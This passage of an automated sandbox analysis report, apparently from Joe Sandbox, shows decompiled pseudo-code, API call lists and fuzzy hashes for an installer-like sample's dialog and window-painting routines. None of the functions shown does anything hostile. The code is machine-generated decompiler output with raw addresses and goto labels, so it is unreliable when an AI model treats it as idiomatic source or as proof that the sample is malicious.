                                                									_t301 = 0;
                                                									if(_t293 <= 0) {
                                                										L74:
                                                										SendMessageW(_v12, 0x14e, _t301, 0);
                                                										_a16 = _t293;
                                                										_a8 = 0x420;
                                                										goto L75;
                                                									} else {
                                                										goto L71;
                                                									}
                                                									do {
                                                										L71:
                                                										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                											_t301 = _t301 + 1;
                                                										}
                                                										_t222 = _t222 + 1;
                                                									} while (_t222 < _t293);
                                                									goto L74;
                                                								}
                                                							}
                                                						}
                                                						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                							goto L93;
                                                						} else {
                                                							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                							if(_t232 == 0xffffffff) {
                                                								goto L93;
                                                							}
                                                							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                								_t294 = 0x20;
                                                							}
                                                							E00401299(_t294);
                                                							SendMessageW(_a4, 0x420, 0, _t294);
                                                							_a12 = _a12 | 0xffffffff;
                                                							_a16 = 0;
                                                							_a8 = 0x40f;
                                                							goto L56;
                                                						}
                                                					}
                                                				} else {
                                                					_v36 = 0;
                                                					_v20 = 2;
                                                					 *0x42a280 = _t291;
                                                					 *0x423700 = GlobalAlloc(0x40,  *0x42a24c << 2);
                                                					_t258 = LoadImageW( *0x42a220, 0x6e, 0, 0, 0, 0);
                                                					 *0x4236f4 =  *0x4236f4 | 0xffffffff;
                                                					_t297 = _t258;
                                                					 *0x4236fc = SetWindowLongW(_v8, 0xfffffffc, E004054DD);
                                                					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                					 *0x4236ec = _t260;
                                                					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                					SendMessageW(_v8, 0x1109, 2,  *0x4236ec);
                                                					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                					}
                                                					DeleteObject(_t297);
                                                					_t298 = 0;
                                                					do {
                                                						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                							if(_t298 != 0x20) {
                                                								_v20 = 0;
                                                							}
                                                							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E00406544(_t298, 0, _t326, 0, _t266)), _t298);
                                                						}
                                                						_t298 = _t298 + 1;
                                                					} while (_t298 < 0x21);
                                                					_t299 = _a16;
                                                					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                					_push(0x15);
                                                					E00404463(_a4);
                                                					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                					_push(0x16);
                                                					E00404463(_a4);
                                                					_t300 = 0;
                                                					_v16 = 0;
                                                					if( *0x42a24c <= 0) {
                                                						L19:
                                                						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                						goto L20;
                                                					} else {
                                                						_t319 = _v24 + 8;
                                                						_v32 = _t319;
                                                						do {
                                                							_t278 =  &(_t319[0x10]);
                                                							if( *_t278 != 0) {
                                                								_v64 = _t278;
                                                								_t279 =  *_t319;
                                                								_v88 = _v16;
                                                								_t311 = 0x20;
                                                								_v84 = 0xffff0002;
                                                								_v80 = 0xd;
                                                								_v68 = _t311;
                                                								_v44 = _t300;
                                                								_v72 = _t279 & _t311;
                                                								if((_t279 & 0x00000002) == 0) {
                                                									if((_t279 & 0x00000004) == 0) {
                                                										 *( *0x423700 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                									} else {
                                                										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                									}
                                                								} else {
                                                									_v80 = 0x4d;
                                                									_v48 = 1;
                                                									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                									_v36 = 1;
                                                									 *( *0x423700 + _t300 * 4) = _t284;
                                                									_v16 =  *( *0x423700 + _t300 * 4);
                                                								}
                                                							}
                                                							_t300 = _t300 + 1;
                                                							_t319 =  &(_v32[0x818]);
                                                							_v32 = _t319;
                                                						} while (_t300 <  *0x42a24c);
                                                						if(_v36 != 0) {
                                                							L20:
                                                							if(_v20 != 0) {
                                                								E00404498(_v8);
                                                								goto L23;
                                                							} else {
                                                								ShowWindow(_v12, 5);
                                                								E00404498(_v12);
                                                								L93:
                                                								return E004044CA(_a8, _a12, _a16);
                                                							}
                                                						}
                                                						goto L19;
                                                					}
                                                				}
                                                			}


























































                                                0x00404ed7
                                                0x00404ef0
                                                0x00404ef5
                                                0x00404efd
                                                0x00404f03
                                                0x00404f19
                                                0x00404f1c
                                                0x00405147
                                                0x0040514e
                                                0x00405162
                                                0x00405150
                                                0x00405152
                                                0x00405155
                                                0x00405156
                                                0x0040515d
                                                0x0040515d
                                                0x0040516e
                                                0x0040517c
                                                0x0040517f
                                                0x00405195
                                                0x0040520a
                                                0x0040520d
                                                0x0040520f
                                                0x00405219
                                                0x00405227
                                                0x00405227
                                                0x00405229
                                                0x00405233
                                                0x00405239
                                                0x0040523c
                                                0x0040523f
                                                0x0040525a
                                                0x00405241
                                                0x0040524b
                                                0x0040524b
                                                0x0040523f
                                                0x00405233
                                                0x00000000
                                                0x0040520d
                                                0x0040519a
                                                0x004051a5
                                                0x004051aa
                                                0x004051b1
                                                0x004051b6
                                                0x004051ba
                                                0x004051c5
                                                0x004051c5
                                                0x004051c9
                                                0x004051cd
                                                0x004051d1
                                                0x004051e4
                                                0x004051d3
                                                0x004051d3
                                                0x004051da
                                                0x004051e0
                                                0x004051dc
                                                0x004051dc
                                                0x004051dc
                                                0x004051da
                                                0x004051e8
                                                0x004051ea
                                                0x004051fd
                                                0x00405200
                                                0x00405203
                                                0x00405203
                                                0x004051cd
                                                0x00000000
                                                0x004051ba
                                                0x0040519c
                                                0x004051a3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040525d
                                                0x0040525d
                                                0x00405264
                                                0x004052d5
                                                0x004052dd
                                                0x004052e5
                                                0x004052e5
                                                0x004052ee
                                                0x004052f0
                                                0x004052f7
                                                0x004052fa
                                                0x004052fa
                                                0x00405300
                                                0x00405307
                                                0x0040530a
                                                0x0040530a
                                                0x00405310
                                                0x00405316
                                                0x0040531c
                                                0x0040531c
                                                0x00405329
                                                0x0040548a
                                                0x00405491
                                                0x004054ae
                                                0x004054b4
                                                0x004054c6
                                                0x004054c6
                                                0x00000000
                                                0x0040532f
                                                0x00405331
                                                0x00405336
                                                0x0040533b
                                                0x00405340
                                                0x00405342
                                                0x00405342
                                                0x00405343
                                                0x00405344
                                                0x00405346
                                                0x00405346
                                                0x0040534e
                                                0x0040538f
                                                0x00405391
                                                0x004053a1
                                                0x004053a4
                                                0x004053a9
                                                0x004053b0
                                                0x004053b3
                                                0x00405455
                                                0x0040545e
                                                0x00405466
                                                0x00405466
                                                0x00405474
                                                0x00405485
                                                0x00405485
                                                0x00000000
                                                0x00405474
                                                0x004053b9
                                                0x004053bc
                                                0x004053c2
                                                0x004053c7
                                                0x004053c9
                                                0x004053cb
                                                0x004053d1
                                                0x004053d8
                                                0x004053dd
                                                0x004053e4
                                                0x004053e7
                                                0x004053e7
                                                0x004053ee
                                                0x004053fa
                                                0x004053fe
                                                0x00405400
                                                0x00405400
                                                0x004053f0
                                                0x004053f2
                                                0x004053f2
                                                0x00405420
                                                0x0040542c
                                                0x0040543b
                                                0x0040543b
                                                0x0040543d
                                                0x00405440
                                                0x00405449
                                                0x00000000
                                                0x00405350
                                                0x0040535b
                                                0x0040535e
                                                0x00405363
                                                0x00405365
                                                0x00405369
                                                0x00405379
                                                0x00405383
                                                0x00405385
                                                0x00405388
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040536b
                                                0x0040536b
                                                0x00405371
                                                0x00405373
                                                0x00405373
                                                0x00405374
                                                0x00405375
                                                0x00000000
                                                0x0040536b
                                                0x0040534e
                                                0x00405329
                                                0x0040526c
                                                0x00000000
                                                0x00405282
                                                0x0040528c
                                                0x00405291
                                                0x00000000
                                                0x00000000
                                                0x004052a3
                                                0x004052a8
                                                0x004052b4
                                                0x004052b4
                                                0x004052b6
                                                0x004052c5
                                                0x004052c7
                                                0x004052cb
                                                0x004052ce
                                                0x00000000
                                                0x004052ce
                                                0x0040526c
                                                0x00404f22
                                                0x00404f27
                                                0x00404f30
                                                0x00404f37
                                                0x00404f49
                                                0x00404f54
                                                0x00404f5a
                                                0x00404f68
                                                0x00404f7c
                                                0x00404f81
                                                0x00404f8e
                                                0x00404f93
                                                0x00404fa9
                                                0x00404fba
                                                0x00404fc7
                                                0x00404fc7
                                                0x00404fca
                                                0x00404fd0
                                                0x00404fd2
                                                0x00404fd5
                                                0x00404fda
                                                0x00404fdf
                                                0x00404fe1
                                                0x00404fe1
                                                0x00405001
                                                0x00405001
                                                0x00405003
                                                0x00405004
                                                0x00405009
                                                0x0040500f
                                                0x00405013
                                                0x00405018
                                                0x00405020
                                                0x00405024
                                                0x00405029
                                                0x0040502e
                                                0x00405036
                                                0x00405039
                                                0x00405109
                                                0x0040511c
                                                0x00000000
                                                0x0040503f
                                                0x00405042
                                                0x00405045
                                                0x00405048
                                                0x00405048
                                                0x0040504e
                                                0x00405057
                                                0x0040505a
                                                0x0040505e
                                                0x00405061
                                                0x00405064
                                                0x0040506d
                                                0x00405076
                                                0x00405079
                                                0x0040507c
                                                0x0040507f
                                                0x004050bd
                                                0x004050e8
                                                0x004050bf
                                                0x004050ce
                                                0x004050ce
                                                0x00405081
                                                0x00405084
                                                0x00405092
                                                0x0040509c
                                                0x004050a4
                                                0x004050ab
                                                0x004050b6
                                                0x004050b6
                                                0x0040507f
                                                0x004050ee
                                                0x004050ef
                                                0x004050fb
                                                0x004050fb
                                                0x00405107
                                                0x00405122
                                                0x00405125
                                                0x00405142
                                                0x00000000
                                                0x00405127
                                                0x0040512c
                                                0x00405135
                                                0x004054c8
                                                0x004054da
                                                0x004054da
                                                0x00405125
                                                0x00000000
                                                0x00405107
                                                0x00405039

                                                APIs
                                                • GetDlgItem.USER32 ref: 00404EE8
                                                • GetDlgItem.USER32 ref: 00404EF3
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F3D
                                                • LoadImageW.USER32 ref: 00404F54
                                                • SetWindowLongW.USER32(?,000000FC,004054DD), ref: 00404F6D
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F81
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404F93
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404FA9
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FB5
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FC7
                                                • DeleteObject.GDI32(00000000), ref: 00404FCA
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404FF5
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405001
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040509C
                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050CC
                                                  • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050E0
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0040510E
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040511C
                                                • ShowWindow.USER32(?,00000005), ref: 0040512C
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405227
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040528C
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052A1
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052C5
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052E5
                                                • ImageList_Destroy.COMCTL32(?), ref: 004052FA
                                                • GlobalFree.KERNEL32 ref: 0040530A
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405383
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 0040542C
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040543B
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00405466
                                                • ShowWindow.USER32(?,00000000), ref: 004054B4
                                                • GetDlgItem.USER32 ref: 004054BF
                                                • ShowWindow.USER32(00000000), ref: 004054C6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 2564846305-813528018
                                                • Opcode ID: 35b73b0ddb5c37642a621bb27d0b5ea63b41f9933646945a10f9cae77aa2ee02
                                                • Instruction ID: f25f8d73efcf6ba6a17deb726488d783a00b9a1a7703c2d4830b1b44d3514242
                                                • Opcode Fuzzy Hash: 35b73b0ddb5c37642a621bb27d0b5ea63b41f9933646945a10f9cae77aa2ee02
                                                • Instruction Fuzzy Hash: 34027D70A00609EFDB20DF95CC45AAF7BB5FB84315F10817AE910BA2E1D7798A52CF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E00404622(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                				intOrPtr _v8;
                                                				int _v12;
                                                				void* _v16;
                                                				struct HWND__* _t56;
                                                				intOrPtr _t69;
                                                				signed int _t75;
                                                				signed short* _t76;
                                                				signed short* _t78;
                                                				long _t92;
                                                				int _t103;
                                                				signed int _t110;
                                                				intOrPtr _t113;
                                                				WCHAR* _t114;
                                                				signed int* _t116;
                                                				WCHAR* _t117;
                                                				struct HWND__* _t118;
                                                
                                                				if(_a8 != 0x110) {
                                                					if(_a8 != 0x111) {
                                                						L13:
                                                						if(_a8 != 0x4e) {
                                                							if(_a8 == 0x40b) {
                                                								 *0x4216d4 =  *0x4216d4 + 1;
                                                							}
                                                							L27:
                                                							_t114 = _a16;
                                                							L28:
                                                							return E004044CA(_a8, _a12, _t114);
                                                						}
                                                						_t56 = GetDlgItem(_a4, 0x3e8);
                                                						_t114 = _a16;
                                                						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                							_v12 = _t103;
                                                							_v16 = _t113;
                                                							_v8 = 0x4281c0;
                                                							if(_t103 - _t113 < 0x800) {
                                                								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                								SetCursor(LoadCursorW(0, 0x7f02));
                                                								_push(1);
                                                								E004048D1(_a4, _v8);
                                                								SetCursor(LoadCursorW(0, 0x7f00));
                                                								_t114 = _a16;
                                                							}
                                                						}
                                                						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                							goto L28;
                                                						} else {
                                                							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                								SendMessageW( *0x42a228, 0x111, 1, 0);
                                                							}
                                                							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                								SendMessageW( *0x42a228, 0x10, 0, 0);
                                                							}
                                                							return 1;
                                                						}
                                                					}
                                                					if(_a12 >> 0x10 != 0 ||  *0x4216d4 != 0) {
                                                						goto L27;
                                                					} else {
                                                						_t69 =  *0x4226e0; // 0x51a0ec
                                                						_t29 = _t69 + 0x14; // 0x51a100
                                                						_t116 = _t29;
                                                						if(( *_t116 & 0x00000020) == 0) {
                                                							goto L27;
                                                						}
                                                						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                						E00404485(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                						E004048AD();
                                                						goto L13;
                                                					}
                                                				}
                                                				_t117 = _a16;
                                                				_t75 =  *(_t117 + 0x30);
                                                				if(_t75 < 0) {
                                                					_t75 =  *( *0x4291fc - 4 + _t75 * 4);
                                                				}
                                                				_t76 =  *0x42a258 + _t75 * 2;
                                                				_t110 =  *_t76 & 0x0000ffff;
                                                				_a8 = _t110;
                                                				_t78 =  &(_t76[1]);
                                                				_a16 = _t78;
                                                				_v16 = _t78;
                                                				_v12 = 0;
                                                				_v8 = E004045D3;
                                                				if(_t110 != 2) {
                                                					_v8 = E00404599;
                                                				}
                                                				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                				_push(0x22);
                                                				E00404463(_a4);
                                                				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                				_push(0x23);
                                                				E00404463(_a4);
                                                				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                				E00404485( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                				_t118 = GetDlgItem(_a4, 0x3e8);
                                                				E00404498(_t118);
                                                				SendMessageW(_t118, 0x45b, 1, 0);
                                                				_t92 =  *( *0x42a230 + 0x68);
                                                				if(_t92 < 0) {
                                                					_t92 = GetSysColor( ~_t92);
                                                				}
                                                				SendMessageW(_t118, 0x443, 0, _t92);
                                                				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                				 *0x4216d4 = 0;
                                                				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                				 *0x4216d4 = 0;
                                                				return 0;
                                                			}



















                                                0x00404634
                                                0x00404761
                                                0x004047be
                                                0x004047c2
                                                0x0040488f
                                                0x00404891
                                                0x00404891
                                                0x00404897
                                                0x00404897
                                                0x0040489a
                                                0x00000000
                                                0x004048a1
                                                0x004047d0
                                                0x004047d6
                                                0x004047e0
                                                0x004047eb
                                                0x004047ee
                                                0x004047f1
                                                0x004047fc
                                                0x004047ff
                                                0x00404806
                                                0x00404813
                                                0x00404824
                                                0x0040482a
                                                0x00404832
                                                0x00404840
                                                0x00404846
                                                0x00404846
                                                0x00404806
                                                0x00404850
                                                0x00000000
                                                0x0040485b
                                                0x0040485f
                                                0x0040486f
                                                0x0040486f
                                                0x00404875
                                                0x00404881
                                                0x00404881
                                                0x00000000
                                                0x00404885
                                                0x00404850
                                                0x0040476c
                                                0x00000000
                                                0x0040477e
                                                0x0040477e
                                                0x00404783
                                                0x00404783
                                                0x00404789
                                                0x00000000
                                                0x00000000
                                                0x004047b2
                                                0x004047b4
                                                0x004047b9
                                                0x00000000
                                                0x004047b9
                                                0x0040476c
                                                0x0040463a
                                                0x0040463d
                                                0x00404642
                                                0x00404653
                                                0x00404653
                                                0x0040465b
                                                0x0040465e
                                                0x00404662
                                                0x00404665
                                                0x00404669
                                                0x0040466c
                                                0x0040466f
                                                0x00404672
                                                0x00404679
                                                0x0040467b
                                                0x0040467b
                                                0x00404685
                                                0x00404692
                                                0x0040469c
                                                0x004046a1
                                                0x004046a4
                                                0x004046a9
                                                0x004046c0
                                                0x004046c7
                                                0x004046da
                                                0x004046dd
                                                0x004046f1
                                                0x004046f8
                                                0x004046fd
                                                0x00404702
                                                0x00404702
                                                0x00404710
                                                0x0040471e
                                                0x00404730
                                                0x00404735
                                                0x00404745
                                                0x00404747
                                                0x00000000

                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046C0
                                                • GetDlgItem.USER32 ref: 004046D4
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004046F1
                                                • GetSysColor.USER32(?), ref: 00404702
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404710
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040471E
                                                • lstrlenW.KERNEL32(?), ref: 00404723
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404730
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404745
                                                • GetDlgItem.USER32 ref: 0040479E
                                                • SendMessageW.USER32(00000000), ref: 004047A5
                                                • GetDlgItem.USER32 ref: 004047D0
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404813
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404821
                                                • SetCursor.USER32(00000000), ref: 00404824
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040483D
                                                • SetCursor.USER32(00000000), ref: 00404840
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040486F
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404881
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                • String ID: Call$N
                                                • API String ID: 3103080414-3438112850
                                                • Opcode ID: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
                                                • Instruction ID: bd26b540472948519bfd0c296b0258925a36bd111cdc3ec084d9598cfd27fd02
                                                • Opcode Fuzzy Hash: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
                                                • Instruction Fuzzy Hash: A16180B1900209FFDB10AF61DD85AAA7B69FB84314F00853AFA05B62D1C7789D61CF99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                				struct tagLOGBRUSH _v16;
                                                				struct tagRECT _v32;
                                                				struct tagPAINTSTRUCT _v96;
                                                				struct HDC__* _t70;
                                                				struct HBRUSH__* _t87;
                                                				struct HFONT__* _t94;
                                                				long _t102;
                                                				signed int _t126;
                                                				struct HDC__* _t128;
                                                				intOrPtr _t130;
                                                
                                                				if(_a8 == 0xf) {
                                                					_t130 =  *0x42a230;
                                                					_t70 = BeginPaint(_a4,  &_v96);
                                                					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                					_a8 = _t70;
                                                					GetClientRect(_a4,  &_v32);
                                                					_t126 = _v32.bottom;
                                                					_v32.bottom = _v32.bottom & 0x00000000;
                                                					while(_v32.top < _t126) {
                                                						_a12 = _t126 - _v32.top;
                                                						asm("cdq");
                                                						asm("cdq");
                                                						asm("cdq");
                                                						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                						_t87 = CreateBrushIndirect( &_v16);
                                                						_v32.bottom = _v32.bottom + 4;
                                                						_a16 = _t87;
                                                						FillRect(_a8,  &_v32, _t87);
                                                						DeleteObject(_a16);
                                                						_v32.top = _v32.top + 4;
                                                					}
                                                					if( *(_t130 + 0x58) != 0xffffffff) {
                                                						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                						_a16 = _t94;
                                                						if(_t94 != 0) {
                                                							_t128 = _a8;
                                                							_v32.left = 0x10;
                                                							_v32.top = 8;
                                                							SetBkMode(_t128, 1);
                                                							SetTextColor(_t128,  *(_t130 + 0x58));
                                                							_a8 = SelectObject(_t128, _a16);
                                                							DrawTextW(_t128, 0x429220, 0xffffffff,  &_v32, 0x820);
                                                							SelectObject(_t128, _a8);
                                                							DeleteObject(_a16);
                                                						}
                                                					}
                                                					EndPaint(_a4,  &_v96);
                                                					return 0;
                                                				}
                                                				_t102 = _a16;
                                                				if(_a8 == 0x46) {
                                                					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                					 *((intOrPtr*)(_t102 + 4)) =  *0x42a228;
                                                				}
                                                				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                			}













                                                0x0040100a
                                                0x00401039
                                                0x00401047
                                                0x0040104d
                                                0x00401051
                                                0x0040105b
                                                0x00401061
                                                0x00401064
                                                0x004010f3
                                                0x00401089
                                                0x0040108c
                                                0x004010a6
                                                0x004010bd
                                                0x004010cc
                                                0x004010cf
                                                0x004010d5
                                                0x004010d9
                                                0x004010e4
                                                0x004010ed
                                                0x004010ef
                                                0x004010ef
                                                0x00401100
                                                0x00401105
                                                0x0040110d
                                                0x00401110
                                                0x00401112
                                                0x00401118
                                                0x0040111f
                                                0x00401126
                                                0x00401130
                                                0x00401142
                                                0x00401156
                                                0x00401160
                                                0x00401165
                                                0x00401165
                                                0x00401110
                                                0x0040116e
                                                0x00000000
                                                0x00401178
                                                0x00401010
                                                0x00401013
                                                0x00401015
                                                0x0040101f
                                                0x0040101f
                                                0x00000000

                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32 ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                                                • Instruction ID: ce1ac2179a7edcd12a9bbec6f3b07c603adbad34dac6b1105353c89659c02e28
                                                • Opcode Fuzzy Hash: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                                                • Instruction Fuzzy Hash: 63417B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0CB74DA55DFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

